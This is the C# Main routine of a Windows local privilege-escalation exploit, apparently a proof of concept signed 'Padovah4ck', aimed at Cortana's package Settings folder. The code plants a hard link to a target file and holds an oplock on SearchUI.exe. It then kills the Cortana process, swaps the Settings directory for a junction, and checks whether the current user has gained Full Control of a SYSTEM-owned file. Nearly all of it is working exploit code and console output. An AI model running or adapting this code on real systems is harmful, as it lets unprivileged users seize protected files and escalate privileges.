public static void Main(string[] args)
{
try
{
string appLocalData = Environment.GetFolderPath((Environment.SpecialFolder.LocalApplicationData));
string dirPackageSettingsToMount = $@"{appLocalData}\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings";
//string tempDir = @"c:\fooDir";
string tempDir = @"c:\" + Guid.NewGuid().ToString();
if (args.Length < 1)
{
Console.WriteLine($"[+] You should Specify a target filename. Default is {fileToOwn}");
args = new string[1];
args[0] = fileToOwn;
}
else
{
if (!File.Exists(args[0]))
{
Console.WriteLine($"[+] {args[0]} not found");
return;
}
}
if (!HasFullControl(args[0], NTAuthoritySystem))
{
Console.WriteLine($@"[+] {NTAuthoritySystem} has no FULL access to {args[0]}. This exploits works only if SYSTEM has FULL control on target file");
return;
}
if (HasFullControl(args[0], WindowsIdentity.GetCurrent().Name))
{
Console.WriteLine($@"[+] {WindowsIdentity.GetCurrent().Name} already has Full Control of {args[0]}");
return;
}
if (GetCortana() == 0)
{
Console.WriteLine("[+] Cortana disabled");
return;
}
if (!IsCortanaRunning())
{
Console.WriteLine($@"[+] This exploit needs that Cortana process that is running ");
Console.WriteLine($@"[+] Start Cortana and run the exploit again ");
Console.WriteLine($@"[+] From cmd : ""start ms-cortana:""");
return;
}
if (!Directory.Exists(tempDir))
{
Directory.CreateDirectory(tempDir);
}
else
{
Directory.Delete(tempDir, true);
Directory.CreateDirectory(tempDir);
}
Console.WriteLine($@"[+] Directory {tempDir} created");
string dirOwner = File.GetAccessControl(tempDir).GetOwner(typeof(NTAccount)).ToString();
string currentUserName = WindowsIdentity.GetCurrent().Name;
if (!currentUserName.ToLower().Equals(dirOwner.ToLower()))
{
Console.WriteLine($@"[!] KO - Owner of Directory {tempDir} is {dirOwner} which is different from current user -> {currentUserName} ");
return;
}
Console.WriteLine($@"[+] Owner of Directory {tempDir} is current user -> {dirOwner} ");
bool created = HardLink.CreateNtHardLink($@"{tempDir}\foo.txt", fileToOwn);
if (!created)
{
Console.WriteLine($@"[!] CreateHardLink from {tempDir}\foo.txt to {fileToOwn} failed ");
return;
}
Console.WriteLine($@"[+] Created HardLink from {tempDir}\foo.txt to {fileToOwn} ");
// Get handle immediately upon service closing file
NtFile ntFile = null;
new Thread(() =>
{
try
{
IntPtr cThread = GetCurrentThread();
SetThreadPriority(cThread, ThreadPriority.THREAD_PRIORITY_HIGHEST);
ntFile = NtFile.Open($@"\??\c:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe", null,
FileAccessRights.GenericRead | FileAccessRights.Synchronize,
FileShareMode.None,
FileOpenOptions.NonDirectoryFile | FileOpenOptions.OpenRequiringOplock |
FileOpenOptions.SynchronousIoNonAlert);
if (ntFile.OpenResult == FileOpenResult.Opened)
{
Console.WriteLine($"[+] Oplock acquired - Opened with handle: {ntFile.Handle.DangerousGetHandle()}");
}
else
{
Console.WriteLine($"[+] Not acquired handle of : {ntFile.Name}");
return;
}
/*while (true)
* {
* try
* {
* Directory.Delete(dirPackageSettingsToMount, true);
* }
* catch (Exception ex)
* {
* continue;
* }
* JunctionPoint.Create(dirPackageSettingsToMount, tempDir, true);
* Console.WriteLine($@"[-] mountpoint created {dirPackageSettingsToMount} to {tempDir}");
* Console.WriteLine($@"[-] Closing handle and free oplock");
* ntFile.Close();
* break;
* }*/
Console.WriteLine($@"[-] checkin {tempDir}\foo.txt existance ");
while (true)
{
try
{
if (!File.Exists($@"{tempDir}\foo.txt"))
{
created = HardLink.CreateNtHardLink($@"{tempDir}\foo.txt", fileToOwn);
if (!created)
{
Console.WriteLine($@"[!] CreateHardLink from {tempDir}\foo.txt to {fileToOwn} failed ");
return;
}
Console.WriteLine($@"[+] Created HardLink from {tempDir}\foo.txt to {fileToOwn} ");
break;
}
continue;
}
catch (Exception ex)
{
Console.WriteLine($@"[+] ex 2 - {ex.Message} ");
break;
}
}
// Give the service some time to rewrite DACLs
System.Threading.Thread.Sleep(3000);
if (HasFullControl(fileToOwn, WindowsIdentity.GetCurrent().Name))
{
Console.WriteLine($@"[+] Done - Exploit Succeded ");
Console.WriteLine($@"[+] Now {WindowsIdentity.GetCurrent().Name} has Full Control over {fileToOwn} ");
Directory.Delete(tempDir, true);
}
else if (HasControl(fileToOwn, authenticatedUsersGroup, FileSystemRights.Modify))
{
Console.WriteLine($@"[+] Done - Exploit Succeded ");
Console.WriteLine($@"[+] Now {authenticatedUsersGroup} has FileSystemRights.Modify over {fileToOwn} ");
Directory.Delete(tempDir, true);
}
else
{
Console.WriteLine($@"[!] Too bad... Exploit did not work out");
Directory.Delete(tempDir, true);
}
Console.WriteLine($@"[...] Exiting - Take care, Padovah4ck ");
}
catch (Exception ex)
{
Console.WriteLine($@"[+] ex 0 - {ex.Message} ");
return;
}
}).Start();
try
{
Thread.Sleep(1000);
Console.WriteLine("[-] Cheking if oplock is acquired ");
if (ntFile.OpenResult == FileOpenResult.Opened)
{
Console.WriteLine("[-] OK - let's go.. Killing Cortana ");
//string sid = WindowsIdentity.GetCurrent().User.Value;
// KillProcessBySidAndProcessName(sid, "SearchUI");
Process process = new Process();
process.StartInfo.FileName = "taskkill.exe";
process.StartInfo.Arguments = "/F /IM searchui.exe";
process.StartInfo.UseShellExecute = false;
process.Start();
process.WaitForExit();
Thread.Sleep(1000);
Console.WriteLine($@"[-] Trying to delete {dirPackageSettingsToMount} and create mountpoint ");
try
{
Directory.Delete(dirPackageSettingsToMount, true);
}
catch (Exception ex)
{
Console.WriteLine($@"[+] ex 1a - {ex.Message} ");
return;
}
JunctionPoint.Create(dirPackageSettingsToMount, tempDir, true);
Console.WriteLine($@"[-] mountpoint created {dirPackageSettingsToMount} to {tempDir}");
Console.WriteLine($@"[-] Closing handle and release oplock");
ntFile.Close();
/*Thread.Sleep(3000);
*
* process = new Process();
* process.StartInfo.FileName = "cmd.exe";
* process.StartInfo.Arguments = "/c start ms-cortana:";
* process.StartInfo.UseShellExecute = false;
* process.Start();
* process.WaitForExit();*/
}
}
catch (Exception ex)
{
Console.WriteLine($@"[+] ex 1 - {ex.Message} ");
return;
}
}
catch (Exception ex)
{
Console.WriteLine("Doh.. exception occurred " + ex.Message);
}
}
